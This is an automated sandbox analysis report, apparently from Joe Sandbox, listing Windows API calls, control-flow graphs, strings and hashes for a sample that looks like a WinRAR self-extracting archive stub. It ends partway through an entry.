                                                          • GetDlgItem.USER32(?,00000068), ref: 00FCB983
                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FCB99E
                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FE35F4), ref: 00FCB9B1
                                                            • Part of subcall function 00FCD453: _wcslen.LIBCMT ref: 00FCD47D
                                                          • SetFocus.USER32(00000000), ref: 00FCB9B8
                                                          • _swprintf.LIBCMT ref: 00FCBA24
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                            • Part of subcall function 00FCD4D4: GetDlgItem.USER32(00000068,0100FCB8), ref: 00FCD4E8
                                                            • Part of subcall function 00FCD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00FCAF07,00000001,?,?,00FCB7B9,00FE506C,0100FCB8,0100FCB8,00001000,00000000,00000000), ref: 00FCD510
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FCD51B
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FE35F4), ref: 00FCD529
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FCD53F
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FCD559
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FCD59D
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FCD5AB
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FCD5BA
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FCD5E1
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FE43F4), ref: 00FCD5F0
                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00FCBA68
                                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00FCBA90
                                                          • GetTickCount.KERNEL32 ref: 00FCBAAE
                                                          • _swprintf.LIBCMT ref: 00FCBAC2
                                                          • GetLastError.KERNEL32(?,00000011), ref: 00FCBAF4
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00FCBB43
                                                          • _swprintf.LIBCMT ref: 00FCBB7C
                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00FCBBD0
                                                          • GetCommandLineW.KERNEL32 ref: 00FCBBEA
                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00FCBC47
                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00FCBC6F
                                                          • Sleep.KERNEL32(00000064), ref: 00FCBCB9
                                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00FCBCE2
                                                          • CloseHandle.KERNEL32(00000000), ref: 00FCBCEB
                                                          • _swprintf.LIBCMT ref: 00FCBD1E
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCBD7D
                                                          • SetDlgItemTextW.USER32(?,00000065,00FE35F4), ref: 00FCBD94
                                                          • GetDlgItem.USER32(?,00000065), ref: 00FCBD9D
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00FCBDAC
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FCBDBB
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCBE68
                                                          • _wcslen.LIBCMT ref: 00FCBEBE
                                                          • _swprintf.LIBCMT ref: 00FCBEE8
                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FCBF32
                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00FCBF4C
                                                          • GetDlgItem.USER32(?,00000068), ref: 00FCBF55
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00FCBF6B
                                                          • GetDlgItem.USER32(?,00000066), ref: 00FCBF85
                                                          • SetWindowTextW.USER32(00000000,00FFA472), ref: 00FCBFA7
                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00FCC007
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCC01A
                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00FCC0BD
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00FCC197
                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00FCC1D9
                                                            • Part of subcall function 00FCC73F: __EH_prolog.LIBCMT ref: 00FCC744
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCC1FD
                                                          Strings
                                                          Similarity
                                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 00FC087C
                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FC088E
                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FC08BF
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FC0B69
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FC0B83
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC0B93
                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00FE3C7C,00000000), ref: 00FC0BB1
                                                          • CloseHandle.KERNEL32(00000000), ref: 00FC0C09
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FC0C1E
                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00FE3C7C,?,00000000,?,00000800), ref: 00FC0C72
                                                          • GetFileAttributesW.KERNELBASE(?,?,00FE3C7C,00000800,?,00000000,?,00000800), ref: 00FC0C9C
                                                          • GetFileAttributesW.KERNEL32(?,?,00FE3D44,00000800), ref: 00FC0CD8
                                                            • Part of subcall function 00FC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FC0836
                                                            • Part of subcall function 00FC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FBF2D8,Crypt32.dll,00000000,00FBF35C,?,?,00FBF33E,?,?,?), ref: 00FC0858
                                                          • _swprintf.LIBCMT ref: 00FC0D4A
                                                          • _swprintf.LIBCMT ref: 00FC0D96
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • AllocConsole.KERNEL32 ref: 00FC0D9E
                                                          • GetCurrentProcessId.KERNEL32 ref: 00FC0DA8
                                                          • AttachConsole.KERNEL32(00000000), ref: 00FC0DAF
                                                          • _wcslen.LIBCMT ref: 00FC0DC4
                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00FC0DD5
                                                          • WriteConsoleW.KERNEL32(00000000), ref: 00FC0DDC
                                                          • Sleep.KERNEL32(00002710), ref: 00FC0DE7
                                                          • FreeConsole.KERNEL32 ref: 00FC0DED
                                                          • ExitProcess.KERNEL32 ref: 00FC0DF5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                          • API String ID: 1207345701-3298887752
                                                          • Opcode ID: 89c1b7feff7d3524f7f151fed437256c43835947c1fdd8b8d0b9dc9b44e106ea
                                                          • Instruction ID: fd9f1be30215c28df0f06d99b15c5812cc4ab63408673a96b75748dc91989ebf
                                                          • Opcode Fuzzy Hash: 89c1b7feff7d3524f7f151fed437256c43835947c1fdd8b8d0b9dc9b44e106ea
                                                          • Instruction Fuzzy Hash: 8DD1B1B14083C5ABC731DF528D8DF9FBAE8AB84708F10491DF2859B151CBB49649EB92

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FCC744
                                                            • Part of subcall function 00FCB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00FCB3FB
                                                          • _wcslen.LIBCMT ref: 00FCCA0A
                                                          • _wcslen.LIBCMT ref: 00FCCA13
                                                          • SetWindowTextW.USER32(?,?), ref: 00FCCA71
                                                          • _wcslen.LIBCMT ref: 00FCCAB3
                                                          • _wcsrchr.LIBVCRUNTIME ref: 00FCCBFB
                                                          • GetDlgItem.USER32(?,00000066), ref: 00FCCC36
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00FCCC46
                                                          • SendMessageW.USER32(00000000,00000143,00000000,00FFA472), ref: 00FCCC54
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FCCC7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                          • API String ID: 2804936435-312220925
                                                          • Opcode ID: 26ae58ee90ecc5f720d883c9604b94a312366226a8f726728c53cd8b17267dfa
                                                          • Instruction ID: 0268f57776b3832bcc6a4acf6bd4f4b5357ba4c45e413882c5c9bf092b137e04
                                                          • Opcode Fuzzy Hash: 26ae58ee90ecc5f720d883c9604b94a312366226a8f726728c53cd8b17267dfa
                                                          • Instruction Fuzzy Hash: BFE16872D00159AADF25DBA0DD86FEE77BCAF04350F0440AAF649E7040EB789E44AF61
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FBDA70
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FBDAAC
                                                            • Part of subcall function 00FBC29A: _wcslen.LIBCMT ref: 00FBC2A2
                                                            • Part of subcall function 00FC05DA: _wcslen.LIBCMT ref: 00FC05E0
                                                            • Part of subcall function 00FC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FBBAE9,00000000,?,?,?,00010444), ref: 00FC1BA0
                                                          • _wcslen.LIBCMT ref: 00FBDDE9
                                                          • __fprintf_l.LIBCMT ref: 00FBDF1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                          • API String ID: 566448164-801612888
                                                          • Opcode ID: c0da96ebbe5a404e6ee67509ccbc4f16c31ea124788217b9b898180d744fc950
                                                          • Instruction ID: 238c76662c8581318ff3fd88215cd3c0228fd3bba8876438fbf2b849ce891fa6
                                                          • Opcode Fuzzy Hash: c0da96ebbe5a404e6ee67509ccbc4f16c31ea124788217b9b898180d744fc950
                                                          • Instruction Fuzzy Hash: 4932E1729002089BCF24EF6ACC46BEE77A9FF04310F54052AFA0597291EBB5D985EF51

                                                          APIs
                                                            • Part of subcall function 00FCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCB579
                                                            • Part of subcall function 00FCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB58A
                                                            • Part of subcall function 00FCB568: IsDialogMessageW.USER32(00010444,?), ref: 00FCB59E
                                                            • Part of subcall function 00FCB568: TranslateMessage.USER32(?), ref: 00FCB5AC
                                                            • Part of subcall function 00FCB568: DispatchMessageW.USER32(?), ref: 00FCB5B6
                                                          • GetDlgItem.USER32(00000068,0100FCB8), ref: 00FCD4E8
                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00FCAF07,00000001,?,?,00FCB7B9,00FE506C,0100FCB8,0100FCB8,00001000,00000000,00000000), ref: 00FCD510
                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FCD51B
                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FE35F4), ref: 00FCD529
                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FCD53F
                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FCD559
                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FCD59D
                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FCD5AB
                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FCD5BA
                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FCD5E1
                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FE43F4), ref: 00FCD5F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                          • String ID: \
                                                          • API String ID: 3569833718-2967466578
                                                          • Opcode ID: 599adad0a4ad0b230c8e58e73d65b27f7869614368fe916f34fcc848f7b1eb51
                                                          • Instruction ID: 149d1b527e6a9d021423f7add7f357c2a07d822d5a538a1bf8a78c61e0c83137
                                                          • Opcode Fuzzy Hash: 599adad0a4ad0b230c8e58e73d65b27f7869614368fe916f34fcc848f7b1eb51
                                                          • Instruction Fuzzy Hash: A831CF71145346AFE322DF209C5BFAB7FACFB82728F000918F5919A180DB6E9905D776

                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00FCD7AE
                                                          • ShellExecuteExW.SHELL32(?), ref: 00FCD8DE
                                                          • ShowWindow.USER32(?,00000000), ref: 00FCD91D
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00FCD959
                                                          • CloseHandle.KERNEL32(?), ref: 00FCD97F
                                                          • ShowWindow.USER32(?,00000001), ref: 00FCD9E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                          • String ID: .exe$.inf
                                                          • API String ID: 36480843-3750412487
                                                          • Opcode ID: a9146afc89732f4ae6d809ebd7bf05ecefe1727a6f267b98c9a25d49f9078c26
                                                          • Instruction ID: 6fe0d1e2bc2f2259139f5a8e9d244800ba1464185b99a25b9d47bea7d364f554
                                                          • Opcode Fuzzy Hash: a9146afc89732f4ae6d809ebd7bf05ecefe1727a6f267b98c9a25d49f9078c26
                                                          • Instruction Fuzzy Hash: 945124748043869AEB319F249A46FBFBBE4AF81764F04042EF5C097191D7B98944FB12

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FD5695,00FD5695,?,?,?,00FDABAC,00000001,00000001,2DE85006), ref: 00FDA9B5
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FDABAC,00000001,00000001,2DE85006,?,?,?), ref: 00FDAA3B
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FDAB35
                                                          • __freea.LIBCMT ref: 00FDAB42
                                                            • Part of subcall function 00FD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          • __freea.LIBCMT ref: 00FDAB4B
                                                          • __freea.LIBCMT ref: 00FDAB70
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1414292761-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 976 fd3b72-fd3b7c 977 fd3bee-fd3bf1 976->977 978 fd3b7e-fd3b8c 977->978 979 fd3bf3 977->979 981 fd3b8e-fd3b91 978->981 982 fd3b95-fd3bb1 LoadLibraryExW 978->982 980 fd3bf5-fd3bf9 979->980 983 fd3c09-fd3c0b 981->983 984 fd3b93 981->984 985 fd3bfa-fd3c00 982->985 986 fd3bb3-fd3bbc GetLastError 982->986 983->980 987 fd3beb 984->987 985->983 990 fd3c02-fd3c03 FreeLibrary 985->990 988 fd3bbe-fd3bd3 call fd6088 986->988 989 fd3be6-fd3be9 986->989 987->977 988->989 993 fd3bd5-fd3be4 LoadLibraryExW 988->993 989->987 990->983 993->985 993->989
                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00FD3C35,?,?,01012088,00000000,?,00FD3D60,00000004,InitializeCriticalSectionEx,00FE6394,InitializeCriticalSectionEx,00000000), ref: 00FD3C03
                                                          Strings
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: api-ms-
                                                          • API String ID: 3664257935-2084034818

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00FC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FC0836
                                                            • Part of subcall function 00FC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FBF2D8,Crypt32.dll,00000000,00FBF35C,?,?,00FBF33E,?,?,?), ref: 00FC0858
                                                          • OleInitialize.OLE32(00000000), ref: 00FCAC2F
                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FCAC66
                                                          • SHGetMalloc.SHELL32(00FF8438), ref: 00FCAC70
                                                          Strings
                                                          Similarity
                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                          • String ID: riched20.dll$3To
                                                          • API String ID: 3498096277-2168385784

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 998 fb98e0-fb9901 call fcec50 1001 fb990c 998->1001 1002 fb9903-fb9906 998->1002 1004 fb990e-fb991f 1001->1004 1002->1001 1003 fb9908-fb990a 1002->1003 1003->1004 1005 fb9921 1004->1005 1006 fb9927-fb9931 1004->1006 1005->1006 1007 fb9933 1006->1007 1008 fb9936-fb9943 call fb6edb 1006->1008 1007->1008 1011 fb994b-fb996a CreateFileW 1008->1011 1012 fb9945 1008->1012 1013 fb99bb-fb99bf 1011->1013 1014 fb996c-fb998e GetLastError call fbbb03 1011->1014 1012->1011 1016 fb99c3-fb99c6 1013->1016 1019 fb99c8-fb99cd 1014->1019 1020 fb9990-fb99b3 CreateFileW GetLastError 1014->1020 1018 fb99d9-fb99de 1016->1018 1016->1019 1022 fb99ff-fb9a10 1018->1022 1023 fb99e0-fb99e3 1018->1023 1019->1018 1021 fb99cf 1019->1021 1020->1016 1024 fb99b5-fb99b9 1020->1024 1021->1018 1026 fb9a2e-fb9a39 1022->1026 1027 fb9a12-fb9a2a call fc0602 1022->1027 1023->1022 1025 fb99e5-fb99f9 SetFileTime 1023->1025 1024->1016 1025->1022 1027->1026
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00FB7760,?,00000005,?,00000011), ref: 00FB995F
                                                          • GetLastError.KERNEL32(?,?,00FB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FB996C
                                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00FB7760,?,00000005,?), ref: 00FB99A2
                                                          • GetLastError.KERNEL32(?,?,00FB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FB99AA
                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00FB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FB99F9
                                                          Similarity
                                                          • API ID: File$CreateErrorLast$Time
                                                          • String ID:
                                                          • API String ID: 1999340476-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1057 fcb568-fcb581 PeekMessageW 1058 fcb5bc-fcb5be 1057->1058 1059 fcb583-fcb597 GetMessageW 1057->1059 1060 fcb5a8-fcb5b6 TranslateMessage DispatchMessageW 1059->1060 1061 fcb599-fcb5a6 IsDialogMessageW 1059->1061 1060->1058 1061->1058 1061->1060
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCB579
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB58A
                                                          • IsDialogMessageW.USER32(00010444,?), ref: 00FCB59E
                                                          • TranslateMessage.USER32(?), ref: 00FCB5AC
                                                          • DispatchMessageW.USER32(?), ref: 00FCB5B6
                                                          Similarity
                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                          • String ID:
                                                          • API String ID: 1266772231-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1062 fcabab-fcabca GetClassNameW 1063 fcabcc-fcabe1 call fc1fbb 1062->1063 1064 fcabf2-fcabf4 1062->1064 1069 fcabf1 1063->1069 1070 fcabe3-fcabef FindWindowExW 1063->1070 1066 fcabff-fcac01 1064->1066 1067 fcabf6-fcabf9 SHAutoComplete 1064->1067 1067->1066 1069->1064 1070->1069
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000050), ref: 00FCABC2
                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00FCABF9
                                                            • Part of subcall function 00FC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FBC116,00000000,.exe,?,?,00000800,?,?,?,00FC8E3C), ref: 00FC1FD1
                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00FCABE9
                                                          Strings
                                                          Similarity
                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                          • String ID: EDIT
                                                          • API String ID: 4243998846-3080729518

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1071 fcdbde-fcdc09 call fcec50 SetEnvironmentVariableW call fc0371 1075 fcdc0e-fcdc12 1071->1075 1076 fcdc14-fcdc18 1075->1076 1077 fcdc36-fcdc38 1075->1077 1078 fcdc21-fcdc28 call fc048d 1076->1078 1081 fcdc1a-fcdc20 1078->1081 1082 fcdc2a-fcdc30 SetEnvironmentVariableW 1078->1082 1081->1078 1082->1077
                                                          APIs
                                                          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FCDBF4
                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FCDC30
                                                          Strings
                                                          Similarity
                                                          • API ID: EnvironmentVariable
                                                          • String ID: sfxcmd$sfxpar
                                                          • API String ID: 1431749950-3493335439

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1083 fb9785-fb9791 1084 fb979e-fb97b5 ReadFile 1083->1084 1085 fb9793-fb979b GetStdHandle 1083->1085 1086 fb9811 1084->1086 1087 fb97b7-fb97c0 call fb98bc 1084->1087 1085->1084 1088 fb9814-fb9817 1086->1088 1091 fb97d9-fb97dd 1087->1091 1092 fb97c2-fb97ca 1087->1092 1094 fb97df-fb97e8 GetLastError 1091->1094 1095 fb97ee-fb97f2 1091->1095 1092->1091 1093 fb97cc 1092->1093 1098 fb97cd-fb97d7 call fb9785 1093->1098 1094->1095 1099 fb97ea-fb97ec 1094->1099 1096 fb980c-fb980f 1095->1096 1097 fb97f4-fb97fc 1095->1097 1096->1088 1097->1096 1100 fb97fe-fb9807 GetLastError 1097->1100 1098->1088 1099->1088 1100->1096 1102 fb9809-fb980a 1100->1102 1102->1098
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00FB9795
                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00FB97AD
                                                          • GetLastError.KERNEL32 ref: 00FB97DF
                                                          • GetLastError.KERNEL32 ref: 00FB97FE
                                                          Similarity
